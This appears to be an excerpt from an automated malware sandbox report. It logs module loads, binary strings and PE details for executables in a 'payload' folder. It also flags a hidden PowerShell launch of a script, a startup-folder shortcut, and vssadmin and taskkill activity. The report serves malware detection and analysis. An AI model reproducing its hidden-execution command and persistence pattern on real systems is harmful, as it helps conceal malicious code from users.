Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\vssadmin.exe	Section loaded: atl.dll
Source: C:\Windows\System32\vssadmin.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\vssadmin.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\vssadmin.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\vssadmin.exe	Section loaded: vss_ps.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: libcrypto-3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: libssl-3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: tcl86t.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: tk86t.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: netapi32.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: zlib1.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: logoncli.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: samcli.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\vssadmin.exe	Section loaded: atl.dll
Source: C:\Windows\System32\vssadmin.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\vssadmin.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\vssadmin.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\vssadmin.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\vssadmin.exe	Section loaded: vss_ps.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: libcrypto-3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: libssl-3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: sqlite3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: pywintypes312.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll

Source: C:\Windows\System32\vssadmin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32

Source: RunTaskboyOnStartup.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: zed.exe, 0000000C.00000002.4754569858.00007FFD8B3F2000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: zed.exe, 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AF41000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: cryptography_rust.pdbc source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: zed.exe, 0000000C.00000002.4762838959.00007FFDA3594000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap` source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3025129202.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: zed.exe, 00000006.00000003.2957363790.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3009033416.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4773436095.00007FFDA5533000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AEA9000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: zed.exe, 00000006.00000003.2957363790.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3009033416.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4773436095.00007FFDA5533000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_tkinter.pdb source: zed.exe, 0000000C.00000002.4772130024.00007FFDA46B8000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AF41000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: zed.exe, 00000006.00000003.2957527840.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3010931232.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4772549604.00007FFDA46D5000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: k1k2k3X9_62_PENTANOMIALp.otherp.onBasisp.tpBasisp.ppBasismX9_62_CHARACTERISTIC_TWOp.primep.char_twofieldTypeX9_62_FIELDIDX9_62_CURVEfieldIDcurvebaseECPARAMETERSvalue.named_curvevalue.parametersvalue.implicitlyCAECPKPARAMETERSprivateKeyparameterspublicKeyEC_PRIVATEKEYec_asn1_group2fieldidcrypto\ec\ec_asn1.cec_asn1_group2curveEC_GROUP_get_ecparametersEC_GROUP_get_ecpkparametersEC_GROUP_new_from_ecparametersEC_GROUP_new_from_ecpkparametersi2d_ECPKParametersd2i_ECPrivateKeyi2d_ECPrivateKeyi2d_ECParametersd2i_ECParameterso2i_ECPublicKeyi2o_ECPublicKeycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Tue Sep 3 19:22:24 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: zed.exe, 0000000C.00000002.4773886122.00007FFDA5B83000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: zed.exe, 0000000C.00000002.4767256618.00007FFDA4171000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764105632.00007FFDA3617000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764807705.00007FFDA368C000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: zed.exe, 0000000C.00000002.4764475130.00007FFDA3652000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026160093.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4771312925.00007FFDA4633000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764807705.00007FFDA368C000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4766514931.00007FFDA3ECE000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: zed.exe, 0000000C.00000002.4772989028.00007FFDA5494000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4765265995.00007FFDA3A89000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: cryptography_rust.pdb source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: zed.exe, 0000000C.00000002.4772989028.00007FFDA5494000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: zed.exe, 0000000C.00000002.4733289830.00000132F7DD0000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: zed.exe, 00000006.00000003.2957527840.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3010931232.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4772549604.00007FFDA46D5000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: zed.exe, 0000000C.00000002.4762838959.00007FFDA3594000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: zed.exe, 0000000C.00000002.4763446184.00007FFDA35ED000.00000002.00000001.01000000.00000019.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -File "C:\Users\user\Documents\gogjothegoat\payload\taskboy.ps1"

Source: VCRUNTIME140_1.dll.6.dr

Static PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]

Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe

Code function: 34_2_00007FFD8A19DB00 GetModuleHandleW,LoadLibraryW,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree,

34_2_00007FFD8A19DB00

Source: libssl-3.dll.6.dr	Static PE information: section name: .00cfg
Source: libcrypto-3.dll.6.dr	Static PE information: section name: .00cfg
Source: python312.dll.6.dr	Static PE information: section name: PyRuntim
Source: zlib1.dll.6.dr	Static PE information: section name: .xdata
Source: VCRUNTIME140.dll.6.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.6.dr	Static PE information: section name: _RDATA
Source: libssl-3.dll.7.dr	Static PE information: section name: .00cfg
